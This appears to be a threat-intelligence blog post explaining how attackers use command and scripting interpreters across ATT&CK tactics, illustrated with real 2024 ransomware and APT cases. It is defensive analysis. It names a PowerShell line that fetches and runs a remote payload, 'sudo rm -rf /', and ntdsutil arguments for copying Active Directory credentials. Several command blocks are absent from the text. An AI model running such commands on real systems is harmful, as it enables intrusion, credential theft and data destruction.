MITRE ATT&CK T1059 Command and Scripting Interpreter

LAST UPDATED ON FEBRUARY 14, 2025

In the Red Report 2025, we shared our insights on the top ten most prevalent MITRE ATT&CK techniques employed by adversaries. Following the publication of The Red Report 2025, we have initiated a blog series to delve into each of these ATT&CK techniques in more detail. This year, from a dataset of 1,000,000 observed malware samples, the Command and Scripting Interpreter technique stood out, accounting for 29% of cases. This translates to its presence in 302,443 malware samples, underlining its significant utilization by adversaries.

This blog post represents the first half of our series on the "Command and Scripting Interpreter" technique, where we dissect how adversaries leverage this method. To explore the sub-techniques associated with the T1059 Command and Scripting Interpreter technique, please click here for the second half of the blog.

Adversary Use of Command and Scripting Interpreters

Command and scripting interpreters (e.g., PowerShell, VBScript, Unix shells) are vital for automating tasks by system administrators and programmers. However, attackers exploit these tools to run harmful code on local and remote systems, carrying out activities like data collection, payload deployment, sensitive information access, and persistence via malicious binaries triggered at login. Since these pre-installed languages directly interact with the OS API, adversaries can operate discreetly, evading weak process monitoring. They also misuse LOLBins (Living Off the Land Binaries)—native system utilities used routinely—to download and execute files, perform reconnaissance, and exfiltrate data, often bypassing security policies that block known malicious executables. Although the T1059 technique is tied to MITRE ATT&CK's Execution tactic, attackers leverage native OS utilities across various tactics to achieve their objectives.

In the examples provided, adversaries utilize various native operating system (OS) utilities, which can be accessed through the command line, to achieve objectives aligned with each tactic in the MITRE ATT&CK framework.

1. Initial Access

Initial access vectors typically leverage native scripting engines (PowerShell, VBScript, Bash, etc.) and command-line interfaces (CMD, Terminal) to:

• Execute dropper scripts that fetch malware payloads from attacker-controlled command-and-control (C2) infrastructure
• Bypass endpoint security through living-off-the-land binaries (LOLBins) and fileless execution
• Establish persistence via scheduled tasks, registry modifications, or startup folder implants
• Create reverse shells or C2 beacons for remote access

The initial compromise often exploits legitimate system interpreters to blend in with normal operations while downloading stage-2 payloads.

For example, in February 2024, the Black Basta ransomware group employed this method after exploiting vulnerabilities in ConnectWise ScreenConnect to gain initial access to their targets [1]. Once inside, they leveraged PowerShell to successfully download and execute malicious payloads, showcasing their reliance on advanced scripting techniques for infiltration. 

One specific command observed during these attacks was:

This command starts with powershell.exe to invoke the tool, followed by -nop to disable profile loading and -w hidden to hide the execution window, enhancing stealth. The core part, IEX ((new-object net.webclient).downloadstring('hxxp://<ip-address>:4444/a')), creates a WebClient object to fetch a script from the given URL and immediately executes it using Invoke-Expression (IEX). This method effectively combines remote payload delivery and execution, exploiting PowerShell's capabilities for initial access while bypassing detection.

Such techniques underscore the importance of monitoring and restricting the use of scripting interpreters and command-line tools to prevent unauthorized access.

2. Execution

Adversaries often exploit command and scripting techniques to perform input capture (ATT&CK T1056). To do so, they can utilize malware that uses built-in scripting environments, such as AppleScript on macOS, allowing attackers to bypass security controls and mimic legitimate user actions.

In 2024, information stealers like the Cthulhu Stealer malware were notably active, targeting macOS users [2]. According to a report released in September 2024, Cthulhu Stealer employed AppleScript to interact with macOS's System Events application to execute malicious commands.

An example of such a command is:

Here, the keystroke command simulates typing the given input into the currently focused window or process. For instance, if the command is keystroke "sudo rm -rf /", it would simulate typing that string, potentially executing a harmful action if run with the right permissions. If an attacker can control the user's environment or make the script seem legitimate, they can cause significant damage without the user's knowledge. This could lead to unauthorized activities like keylogging, screen capturing, and file exfiltration, allowing attackers to steal sensitive information such as login credentials and financial data.

3. Persistence

Command and scripting interpreters are critical tools for adversaries to execute and automate persistence mechanisms, allowing them to maintain continuous access to compromised environments. These interpreters enable attackers to issue commands or run scripts that can modify system configurations, deploy malicious payloads, and automate tasks that ensure their presence remains undetected over time.

In November 2024, researchers identified that the Earth Estries (a.k.a Salt Typhoon) threat group employs advanced techniques to maintain persistence in compromised systems [3]. One such technique involved using a command to create a malicious Windows service through the Service Control (sc) tool. This command was discovered during an investigation into the group's tactics, particularly their method of deploying and sustaining malware persistence. 

The specific command they used was:

4. Privilege Escalation

Adversaries frequently leverage command-line tools and scripting to escalate their privileges, enabling them to bypass access controls and gain higher levels of control over compromised systems. This approach is highly effective as it exploits legitimate system functionality, often evading detection. 

In November 2024, the BianLian ransomware group demonstrated this tactic by exploiting a Windows vulnerability (CVE-2022-37969) to elevate privileges on targeted systems [4]. 

The BianLian actors utilized the Windows Command Shell to execute the command, which added a specified user to the local administrators group, thereby granting them administrative privileges. 

This method enabled the attackers to escalate their privileges within the compromised environment, allowing them to expand their capabilities and perform further malicious activities, such as data exfiltration, establishing persistence, and deploying ransomware. This case underscores the ongoing threat posed by unpatched vulnerabilities and the strategic use of command-line tools in privilege escalation attacks.

5. Defense Evasion

Adversaries prioritize defense evasion to bypass or disable security mechanisms, enabling their attacks to proceed undetected. This tactic often involves exploiting built-in tools and obfuscation techniques to avoid triggering traditional defenses.

For example, in February 2024, the Rhysida ransomware group employed an encoded PowerShell command manipulate Windows settings covertly [5]:

When decoded, it translates to:

This command leverages PowerShell to run gpupdate.exe in a hidden window, forcing Group Policy updates to modify or disable security configurations. By exploiting trusted system tools and employing hidden, encoded commands, attackers can evade detection and facilitate ransomware execution. This approach exemplifies the sophisticated use of native utilities to bypass traditional monitoring systems.

6. Credential Access

Adversaries frequently exploit command-line tools and scripting interpreters to gain unauthorized access to credentials, leveraging their flexibility and integration with system utilities. These methods allow attackers to interact with sensitive system components, such as Active Directory, to extract valuable data like user credentials and password hashes.

To give a solid example, in October 2024, CISA observed Iranian cyber actors using the ntdsutil.exe command to extract the NTDS.dit file, a critical component of Active Directory containing user credentials [6]. 

The command leverages ntdsutil.exe, a Windows Domain Controller management utility, to create a full backup of the Active Directory database (ntds.dit) along with associated registry files. Breaking down the command sequence: "ac i ntds" activates the instance of Active Directory Database, "ifm" enters the Install From Media mode, and "create full c:\temp\ntds" generates a complete backup in the specified directory. The trailing 'q q' parameters exit both the IFM context and ntdsutil itself.

This command is particularly sensitive from a security perspective as it creates a copy of the entire Active Directory database, which contains all domain objects including user accounts, computer accounts, and most critically - password hashes. In malicious contexts, attackers often use this technique to exfiltrate domain credentials since the backed-up ntds.dit file can be processed offline to extract password hashes for every domain user. This type of attack is especially dangerous because it provides persistent access to the domain even if passwords are later changed, as historical password hashes are also stored in the database.

7. Discovery

Adversaries often exploit command-line tools to gather information and establish control over compromised environments, leveraging their simplicity and integration with system functionality. 

In November 2024, the BianLian ransomware group exemplified this tactic by employing Windows Command Shell commands to gather detailed information about domain users and groups [4], facilitating credential access and enabling lateral movement within victim networks. 

These commands were key to their reconnaissance and attack strategies:

• Search for Passwords in Files

This command searches for the term "password" in all files within the current directory and subdirectories, redirecting the results to a specified file. This helps attackers locate plaintext passwords stored in files.

• Search for Domain Group Information

Here, the net commands queried the domain controller for comprehensive information about domain groups, high-privilege accounts (e.g., 'Domain Admins'), and domain devices ('Domain Computers'). These commands also provided a full list of domain users, enabling the group to prioritize targets for credential harvesting and lateral movement. 

By leveraging these legitimate tools, BianLian actors effectively blended into normal administrative activities, evading detection while advancing their attack objectives.

8. Lateral Movement

Adversaries often leverage PowerShell for lateral movement, using its robust remote execution capabilities to expand their reach within compromised networks. 

In August 2024, the Everest ransomware group utilized PowerShell's Invoke-Command cmdlet to execute commands on remote systems [20], enabling lateral movement within compromised networks. 

The command specifies the target system using the -ComputerName parameter, while the -ScriptBlock parameter defines the script or command to be executed remotely. The -Credential parameter provides the necessary authentication, often using stolen or compromised credentials, to access the target system with appropriate privileges. This method allows attackers to perform tasks such as executing malicious scripts, altering configurations, or deploying additional payloads on remote machines. 

By leveraging PowerShell's native remote execution functionality, the group effectively expanded their control over the network while avoiding detection by traditional security mechanisms.

9. Collection

Collection is one of the main activities carried out by malware like CarnavalHeist to gather sensitive information from victims. Reported in May 2024, the provided script showcases how CarnavalHeist implements two critical functions for data collection: screen capturing and keylogging [7]. 

The capture_screen function utilizes the Python PIL.ImageGrab library to take snapshots of the victim's screen. By invoking the ImageGrab.grab() method, it captures the current display, which is then saved as a screenshot in the victim's public folder under the filename screenshot.png. This feature enables attackers to monitor sensitive on-screen activities, such as online banking sessions or confidential document access, providing them with visual insights into the victim's interactions.

Similarly, the log_keys function demonstrates CarnavalHeist's capability to record keystrokes using the keyboard library. It initiates keylogging by starting a recording session and writes the captured events into a log file, keystrokes.log, stored in the public directory. The script captures each keypress until the user presses the escape key (esc), making it possible for attackers to harvest sensitive data like passwords, PINs, or other typed credentials. 

Together, these functions allow CarnavalHeist to effectively gather critical information from compromised systems, aiding its primary goal of financial theft through precise credential and session monitoring.

10. Command and Control

Adversaries often utilize command and scripting interpreters to establish C2 channels, enabling them to execute commands and maintain control over compromised systems. 

For instance, in 2024, the Lazarus Group employed a Python-based backdoor named BeaverTail [8]. This malware facilitated C2 communication by executing Python scripts that connected to attacker-controlled servers. An example command used in this context is:

This command establishes a socket connection from the compromised host to the attacker's server, enabling the transmission of commands and data.

11. Impact

Adversaries frequently leverage command-line tools and scripting to target backup mechanisms, obstructing victims' ability to recover data after an attack. 

In May 2024, the Akira ransomware group exemplified this by using a PowerShell command to delete Volume Shadow Copies [9], a critical Windows feature for data recovery. The command employed was:

This command first uses Get-WmiObject Win32_Shadowcopy to enumerate all existing Volume Shadow Copies, which are integral system snapshots used for backup. It then invokes Remove-WmiObject to delete the retrieved shadow copies, effectively eliminating a vital recovery mechanism. By executing this command, Akira operators ensured that victims could not restore encrypted files from shadow copies, intensifying the pressure to pay the ransom. 

References

[1] S. Ozeren. “CVE-2024-1709 & CVE-2024-1708: ConnectWise ScreenConnect Vulnerability Exploitations,” Picus Security. https://www.picussecurity.com/resource/blog/cve-2024-1709-cve-2024-1708-connectwise-screenconnect-vulnerability-exploitations 

[2] “Threat Intelligence Report 17th September – 23rd September 2024.” Available: https://redpiranha.net/news/threat-intelligence-report-september-17-september-23-2024?utm_source=chatgpt.com. 

[3] S. Ozeren. “Salt Typhoon: A Persistent Threat to Global Telecommunications Infrastructure,” Picus Security. https://www.picussecurity.com/resource/blog/salt-typhoon-telecommunications-threat

[4] “#StopRansomware: BianLian Ransomware Group,” Cybersecurity and Infrastructure Security Agency CISA. Available: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-136a. 

[5] Trend Research, “Ransomware Spotlight: Rhysida.” Available: https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-rhysida. 

[6] “Website.” Available: https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-290a

[7] C. Talos, “New banking trojan ‘CarnavalHeist’ targets Brazil with overlay attacks,” Cisco Talos Blog, May 31, 2024. Available: https://blog.talosintelligence.com/new-banking-trojan-carnavalheist-targets-brazil/. 

[8] “APT Lazarus: Eager Crypto Beavers, Video calls and Games,” Group-IB, Sep. 04, 2024. Available: https://www.group-ib.com/blog/apt-lazarus-python-scripts/. 

[9] J. A. B. Vieda, “A spotlight on Akira ransomware from X-Force Incident Response and Threat Intelligence,” Security Intelligence, May 02, 2024. Available: https://securityintelligence.com/x-force/spotlight-akira-ransomware-x-force/.